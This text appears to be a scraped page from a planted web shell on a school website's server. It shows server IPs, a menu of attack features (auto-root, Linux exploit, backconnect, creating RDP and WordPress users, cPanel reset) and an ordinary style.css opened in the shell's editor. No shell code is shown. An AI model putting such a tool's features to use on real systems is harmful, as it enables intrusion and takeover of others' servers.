Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gandhi-school /
public /
frontend /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.min.css
214.48
KB
-rw-rw-r--
responsive.css
4.67
KB
-rw-rw-r--
show-gallery.css
1.88
KB
-rw-rw-r--
style.css
22.79
KB
-rw-rw-r--
variable.css
2.32
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : style.css
/********** Template CSS **********/ :root { /* --primary: #1d79be; */ --primary: #1d79be; --light: #ffffff; --dark: #141414; --brand: #4876F1; } body { overflow-x: hidden !important; } .fw-medium { font-weight: 600 !important; } .fw-semi-bold { font-weight: 700 !important; } .back-to-top { position: fixed; display: none; right: 45px; bottom: 45px; z-index: 99; } /*** Spinner ***/ #spinner { opacity: 0; visibility: hidden; transition: opacity .5s ease-out, visibility 0s linear .5s; z-index: 99999; } #spinner.show { transition: opacity .5s ease-out, visibility 0s linear 0s; visibility: visible; opacity: 1; } /*** Button ***/ .btn { font-family: 'Nunito', sans-serif; font-weight: 600; transition: .5s; } .text-head-primary { color: #1d79be; } /* .containerf{ margin-left: 0.rem; margin-right: 0.5rem; } */ .btn.btn-primary { background-color: #1d79be; color: #FFFFFF; } .btn.btn-secondary { background-color: #1d79be; color: #ffffff; } .btn-square { width: 38px; height: 38px; } .btn-sm-square { width: 32px; height: 32px; } .btn-lg-square { width: 48px; height: 48px; } .btn-square, .btn-sm-square, .btn-lg-square { padding: 0; display: flex; align-items: center; justify-content: center; font-weight: normal; border-radius: 0px; } /*** Navbar ***/ .navbar .dropdown-toggle::after { border: none; content: "\f107"; font-family: "Font Awesome 5 Free"; font-weight: 900; vertical-align: middle; margin-left: 8px; } .navbar-light .navbar-nav .nav-link { margin-right: 30px; padding: 25px 0; color: #FFFFFF; font-size: 15px; /* text-transform: uppercase; */ outline: none; font-size: 16px; /* color: #0f1266 !important; */ } .navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link.active { color: var(--primary); } @media (max-width: 991.98px) { .navbar-light .navbar-nav .nav-link { margin-right: 0; padding: 10px 0; } .navbar-light .navbar-nav { border-top: 1px solid #EEEEEE; } } .navbar-light .navbar-brand, .navbar-light a.btn { height: 75px; } .navbar-light .navbar-nav .nav-link { color: var(--dark); font-weight: 500; } .navbar-light.sticky-top { top: -100px; transition: .5s; } @media (min-width: 992px) { .navbar .nav-item .dropdown-menu { display: block; margin-top: 0; opacity: 0; visibility: hidden; transition: .5s; } .navbar .dropdown-menu.fade-down { top: 100%; transform: rotateX(-75deg); transform-origin: 0% 0%; } .navbar .nav-item:hover .dropdown-menu { top: 100%; transform: rotateX(0deg); visibility: visible; transition: .5s; opacity: 1; } } /*** Header carousel ***/ @media (max-width: 768px) { .header-carousel .owl-carousel-item { position: relative; min-height: 500px; } .header-carousel .owl-carousel-item img { position: absolute; width: 100%; height: 100%; object-fit: cover; } } .header-carousel .owl-nav { position: absolute; top: 50%; right: 8%; transform: translateY(-50%); display: flex; flex-direction: column; } .header-carousel .owl-nav .owl-prev, .header-carousel .owl-nav .owl-next { margin: 7px 0; width: 45px; height: 45px; display: flex; align-items: center; justify-content: center; color: #FFFFFF; background: transparent; border: 1px solid #FFFFFF; font-size: 22px; transition: .5s; } .header-carousel .owl-nav .owl-prev:hover, .header-carousel .owl-nav .owl-next:hover { background: var(--primary); border-color: var(--primary); } .page-header { background: linear-gradient(rgba(24, 29, 56, .7), rgba(24, 29, 56, .7)), url(/fronten/Npa/background.jpg); background-position: center center; background-repeat: no-repeat; background-size: cover; } .page-header-inner { background: rgba(15, 23, 43, .7); } .breadcrumb-item+.breadcrumb-item::before { color: var(--light); } /*** Section Title ***/ .section-title { position: relative; display: inline-block; text-transform: uppercase; } .section-title::before { position: absolute; content: ""; width: calc(100% + 80px); height: 2px; top: 4px; left: -40px; background: var(--primary); z-index: -1; } .section-title::after { position: absolute; content: ""; width: calc(100% + 120px); height: 2px; bottom: 5px; left: -60px; background: var(--primary); z-index: -1; } .section-title.text-start::before { width: calc(100% + 40px); left: 0; } .section-title.text-start::after { width: calc(100% + 60px); left: 0; } /*** Service ***/ .service-item { background: var(--light); transition: .5s; } .service-item:hover { margin-top: -10px; background: var(--primary); } .service-item * { transition: .5s; } .service-item:hover * { color: var(--light) !important; } /*** Categories & Courses ***/ .category img, .course-item img { transition: .5s; } .category a:hover img, .course-item:hover img { transform: scale(1.1); } /*** Team ***/ .team-item img { transition: .5s; } .team-item:hover img { transform: scale(1.1); } /*** Testimonial ***/ .testimonial-carousel::before { position: absolute; content: ""; top: 0; left: 0; height: 100%; width: 0; background: linear-gradient(to right, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 0) 100%); z-index: 1; } .testimonial-carousel::after { position: absolute; content: ""; top: 0; right: 0; height: 100%; width: 0; background: linear-gradient(to left, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 0) 100%); z-index: 1; } @media (min-width: 768px) { .testimonial-carousel::before, .testimonial-carousel::after { width: 200px; } .published_left_menu { overflow-y: auto !important; max-height: 142vh !important; border: 1px solid #ccc !important; padding: 1opx !important; scrollbar-width: thin; scrollbar-color: #d2d2d2 #f1f1f1; } } @media (min-width: 992px) { .testimonial-carousel::before, .testimonial-carousel::after { width: 300px; } } .testimonial-carousel .owl-item .testimonial-text, .testimonial-carousel .owl-item.center .testimonial-text * { transition: .5s; } .testimonial-carousel .owl-item.center .testimonial-text { background: var(--primary) !important; } .testimonial-carousel .owl-item.center .testimonial-text * { color: #FFFFFF !important; } .testimonial-carousel .owl-dots { margin-top: 24px; display: flex; align-items: flex-end; justify-content: center; } .testimonial-carousel .owl-dot { position: relative; display: inline-block; margin: 0 5px; width: 15px; height: 15px; border: 1px solid #CCCCCC; transition: .5s; } .testimonial-carousel .owl-dot.active { background: var(--primary); border-color: var(--primary); } /*** Footer ***/ .footer .btn.btn-social { margin-right: 5px; width: 35px; height: 35px; display: flex; align-items: center; justify-content: center; color: var(--light); font-weight: normal; border: 1px solid #FFFFFF; border-radius: 35px; transition: .3s; } .footer { background-color: #1d79be; } .footer .btn.btn-social:hover { color: var(--primary); } .footer .btn.btn-link { display: block; margin-bottom: 5px; padding: 0; text-align: left; color: #FFFFFF; font-size: 15px; font-weight: normal; text-transform: capitalize; transition: .3s; } .footer .btn.btn-link::before { position: relative; content: "\f105"; font-family: "Font Awesome 5 Free"; font-weight: 900; margin-right: 10px; } .footer .btn.btn-link:hover { letter-spacing: 1px; box-shadow: none; } .footer .copyright { padding: 25px 0; font-size: 15px; border-top: 1px solid rgba(256, 256, 256, .1); } .footer .copyright a { color: var(--light); } .footer .footer-menu a { margin-right: 15px; padding-right: 15px; border-right: 1px solid rgba(255, 255, 255, .1); } .footer .footer-menu a:last-child { margin-right: 0; padding-right: 0; border-right: none; } .nav_head { padding-left: 0.5em; } /* .nav_head h5{ font-size: 5pt; } */ .nav_head h6 { color: #1d79be; } /* cood with kishor */ .carousel { position: relative; height: 90vh; /* overflow: hidden; */ object-fit: cover; } .owl-carousel img { height: 100vh !important; object-fit: cover; } .sliderr { height: 90vh !important; object-fit: cover; } label { margin: 0px 10px; } .dataTables_wrapper .dataTables_length, .dataTables_wrapper .dataTables_filter, .dataTables_wrapper .dataTables_info, .dataTables_wrapper .dataTables_processing, .dataTables_wrapper .dataTables_paginate { color: #333; margin-left: 10px; } .line-hightt { line-height: 25px !important; } .members-box { border: 1px solid #ddd; border-radius: 10px; padding: 30px; min-height: 370px; height: 410px; text-align: center; transition: 0.2s; } .members-box div{ display: flex; justify-content: center; } .members-box img { vertical-align: middle; border-radius: 50%; height: 100%; border: 0; padding: 10px; } .members-box p { margin: 0 0 10px !important; } .members-box:focus, .members-box:hover { color: #23527c; background-color: #0000000d; /* text-decoration: underline; */ box-shadow: 0 4px 20px rgba(0, 0, 0, 0.16) !important; /* padding: 1px; */ } .members-main-box { padding: 10px; padding-top: 18px; } .waves { position: relative; width: 100%; height: 15vh; margin-bottom: -7px; min-height: 100px; max-height: 400px; } /* Animation footer111 */ .parallax>use { animation: move-forever 25s cubic-bezier(.55, .5, .45, .5) infinite; } .parallax>use:nth-child(1) { animation-delay: -2s; animation-duration: 7s; } .parallax>use:nth-child(2) { animation-delay: -3s; animation-duration: 10s; } .parallax>use:nth-child(3) { animation-delay: -4s; animation-duration: 13s; } .parallax>use:nth-child(4) { animation-delay: -5s; animation-duration: 20s; } @keyframes move-forever { 0% { transform: translate3d(-90px, 0, 0); } 100% { transform: translate3d(85px, 0, 0); } } /*Shrinking for mobile*/ @media (max-width: 768px) { .waves { height: 40px; min-height: 40px; } .content { height: 30vh; } } /*Other*/ .unique-color-dark { background-color: #1d78be1f !important; } .executive-commitee { background-color: #1d78be10; } .fontt { font-size: 53px !important; } /* about us page cornor desgine */ .box { box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.17); /* border: 1px solid #134c649e; */ padding: 10px; position: relative; width: 100%; height: 100%; border-radius: 3px; } /* .box::after { content: ""; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 101%; height: 80%; border: solid #fff; border-width: 0px 5px; opacity: 100; } .box::before { content: ""; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 90%; height: 102%; border: solid #fff; border-width: 5px 0px; opacity: 100; } */ .introduction { position: relative; } .introduction-img { background-color: #fff !important; position: absolute; box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.355); width: 150px; height: 150px; border-radius: 50%; object-fit: cover; top: 50%; left: 50%; transform: translate(-50%, -50%); } .introduction-img::after { width: 150px; height: 150px; content: ''; position: absolute; border: 2px dotted #4978f2; border-radius: 50%; top: 0px; left: 0px; transform: translate(-50%, -50%); animation: pulse 20s infinite linear; } @keyframes pulse { 0% { transform: rotate(0deg); } 25% { transform: rotate(90deg); } 50% { transform: rotate(180deg); } 75% { transform: rotate(270deg); } 100% { transform: rotate(360deg); } } .introduction-img img { width: 100%; border-radius: 50%; } .breadcrumb-item a { color: #fff !important; } .download-membership { text-decoration: none !important; transition: 0.4s; } .download-membership:hover { text-decoration: underline !important; } .membership-apply-button button { width: 25%; border-radius: 8px; } .membership-apply-button button:hover { background-color: #2e319277 !important; outline: #2E3192; color: #fff; } .nav-membership-apply { margin-right: 0px !important; } .nav-membership-apply:hover .btn-primary { background-color: #4145c6 !important; } .contact .php-email-form button[type=submit] { background: #2E3192; border: 0; padding: 10px 24px; color: #fff; } .contact .info-box { color: #444444; background: #fff; text-align: center; box-shadow: 0 0 30px rgba(214, 215, 216, 0.6); padding: 20px 0 30px 0; } .contact .php-email-form { box-shadow: 0 0 30px rgba(214, 215, 216, 0.6); padding: 30px; background: #fff; } .bx { font-family: boxicons !important; font-weight: 400 !important; font-style: normal; font-variant: normal; line-height: 1; text-rendering: auto; display: inline-block; text-transform: none; /* speak: none; */ -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .g-recaptcha { background: #2E3192; border: 0; padding: 10px 24px !important; color: #fff; } .executive-committe-title { display: inline-block; font-size: 28px; position: relative; text-align: center; color: #165d94; font-size: 30px; margin-bottom: 18px; } .executive-committe-title::before, .executive-committe-title::after { content: ""; display: block; height: 2px; background-color: #165d94; position: absolute; border-radius: 0px 0px 4px 0px; } .executive-committe-title::before { top: 110%; width: 90%; left: 0; transform: translateY(-50%); } .executive-committe-title::after { top: 130%; width: 80%; left: 0; transform: translateY(-50%); } /* Member Details page css*/ .details_conatiner { background: #f0f0f0; display: flex; height: fit-content; padding: 30px 44px 40px 44px !important; display: grid; grid: 1fr; align-items: center; } .member { display: none; padding: 20px 15px; min-width: 300px; max-width: 510px; max-height: fit-content; background: white; display: flex; flex-direction: column; align-items: center; text-align: center; border-radius: 20px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.247); transition: 0.8; } .member:hover { transition: 0.6s; background: rgb(245, 245, 245); box-shadow: 0 4px 10px rgba(0, 0, 0, 0.445); } .member img { border: 5px solid #ebebeb; } .member p { margin: 0; } /* Animation */ .details { padding: 1.5px; --border-size: 2px; --border-angle: 0turn; height: fit-content; background-image: conic-gradient(from var(--border-angle), #fff, #fff 50%, #fff), conic-gradient(from var(--border-angle), transparent 20%, rgb(73, 162, 240), #134C64); background-size: calc(100% - (var(--border-size) * 1)) calc(100% - (var(--border-size) * 1)), cover; background-position: center center; background-repeat: no-repeat; animation: bg-spin 5s linear infinite; } @keyframes bg-spin { to { --border-angle: 1turn; } } @property --border-angle { syntax: "<angle>"; inherits: true; initial-value: 0turn; } .member strong { padding-right: 3px; /* color: #103552; */ } .circleBox { height: 100px; background-color: #2e3192; background-image: linear-gradient(deg, #083142 100%, #9c9ffa 0%); width: 100%; border-radius: 100px; align-items: center; position: relative; box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.4); } .circleBox img { border-radius: 50%; border: 4px solid #fff; outline-width: 15px 15px 0px 15px; outline-color: #2e3192; outline-style: solid; position: absolute; top: 50%; left: 12%; transform: translate(-50%, -50%); box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.3); } .name { font-size: 24px; font-weight: 800 !important; } .content-right p { margin: 0; font-size: 17px; } .content-left p { margin: 0; font-size: 17px; } .main-content { margin-top: 70px; } .member-info .d-flex strong { min-width: 180px; text-align: left; } .member-info-right strong { text-align: center; min-width: fit-content !important; } .member-info-left .d-flex strong, .content-right .d-flex strong { min-width: 225px; text-align: left; } .member-info-left, .member-info-right { font-size: 20px; } .circleBox2 { background-color: #2e3192; /* background-image: linear-gradient(deg, #083142 100%, #9c9ffa 0%); */ border-radius: 100px; align-items: center; box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.4); text-align: center; } .circleBox2 h1, p { margin: 0; padding: 0; } .circleBox2-img img { border-radius: 50%; border: 4px solid #fff; outline-width: 15px 15px 0px 15px; outline-color: #2E3192; outline-style: solid; box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.3); } .member-profile-name { margin-bottom: 50px; } .download-qr-btn a:hover { text-decoration: none !important; } /* Responsive */ @media (max-width: 767.98px) { .name { font-size: 18px !important; } .circleBox2 { padding: 10px 8px; margin-top: 16px; } .member-profile-name { margin-bottom: 18px !important; } .main-content { margin-top: 18px; } .content-left p { margin: 0; font-size: 16px !important; } .member-info-left, .member-info-right { font-size: 16px; } .member-info-left .d-flex strong, .content-right .d-flex strong { min-width: 145px; text-align: left; } .skill_experiences { font-size: 15.5px !important; } .skill_experiences span { font-size: 16px !important; } .content-right h3 { font-size: 18px; margin-top: 14px; } .qr img { width: 80px !important; } .qr { padding: 30px 30px 0px 30px !important; display: flex; justify-content: center; } .qr-box { /* display: inline !important; */ width: fit-content; } .mt-lg-0{ margin-top: 0px !important; } .py-sm-0 { padding-top: 0 !important; padding-bottom: 0 !important; } .py-sm-1 { padding-top: 0.25rem !important; padding-bottom: 0.25rem !important; } .py-sm-2 { padding-top: 0.5rem !important; padding-bottom: 0.5rem !important; } .py-sm-3 { padding-top: 1rem !important; padding-bottom: 1rem !important; } .py-sm-4 { padding-top: 1.5rem !important; padding-bottom: 1.5rem !important; } .py-sm-5 { padding-top: 3rem !important; padding-bottom: 3rem !important; } } @media (max-width: 992px) { .mt-lg-0 { margin-top: 0px !important; } .navbar-brand img{ padding-left: 16px !important; } .qr img { width: 80px !important; } .qr { padding: 30px 30px 0px 30px !important; display: flex; justify-content: center; } .qr-box { /* display: inline !important; */ width: fit-content; } } @media (min-width: 992px) { .mt-lg-5{ margin-top: 3rem !important; } .mb-lg-4{ margin-bottom: 2rem !important; } .mb-lg-3{ margin-bottom: 1.5rem !important; } .mb-lg-2{ margin-bottom: 1rem !important; } .mb-lg-1{ margin-bottom: 0.5rem !important; } .mb-lg-0{ margin-bottom: 0rem !important; } .navbar-brand img{ padding-left: 0px !important; } .member-info-left, .skill_experiences { padding-left: 15px; } } /* member table css */ table.custom-datatable { border-collapse: collapse; width: 100%; margin: 20px 0; padding-top: 31px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } table.custom-datatable td { color: #222222 !important; } table.custom-datatable th, table.custom-datatable td { border: 1px solid #ddd; padding: 10px; text-align: left; } table.custom-datatable th { background-color: #d1d1d1; color: #000; font-weight: bold; } table.custom-datatable tr:nth-child(even) { background-color: #f3f3f3; } table.custom-datatable tr:hover { background-color: #f5f5f5; transition: 0.4s; } table.custom-datatable_wrapper .dataTables_paginate { margin-top: 10px; } .custom-datatable_wrapper .dataTables_paginate .paginate_button { background-color: #d1d1d1; color: white; border: none; padding: 5px 10px; margin: 2px; cursor: pointer; border-radius: 4px; } .custom-datatable_wrapper .dataTables_paginate .paginate_button:hover { background-color: #d3d3d3; } .custom-datatable_wrapper .dataTables_length select, .custom-datatable_wrapper .dataTables_filter input { border: 1px solid #ddd; padding: 5px; margin: 5px; border-radius: 4px; } .myTable_filter { margin-bottom: 102px !important; } .view-details { background-color: #728BDD; } .view-details:hover { background: #283e86; transition: 0.4s; } .view-card-table { background: #283e86; } .view-card-table:hover { background: #192b66; transition: 0.4s; } .view-container { transition: opacity 0.5s ease; } .hidden { display: none; } .highlight { font-weight: bold; } .btn { cursor: pointer; } .show-news-right img { width: 100%; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); border-radius: 4px; } .notice-table img { width: 50px !important; border-radius: 4px; } .news-card img { object-fit: cover !important; } .menu-btn { background-color: var(--brand-color) !important; } .download-button { padding: 10px 15px; background-color: #0c3499; color: white; border: none; border-radius: 5px; cursor: pointer; display: flex; align-items: center; } .download-button:hover { background-color: #233571; transition: 0.3s; color: rgb(230, 228, 228); } .noticeModal-notice img{ width: 100%; }
Close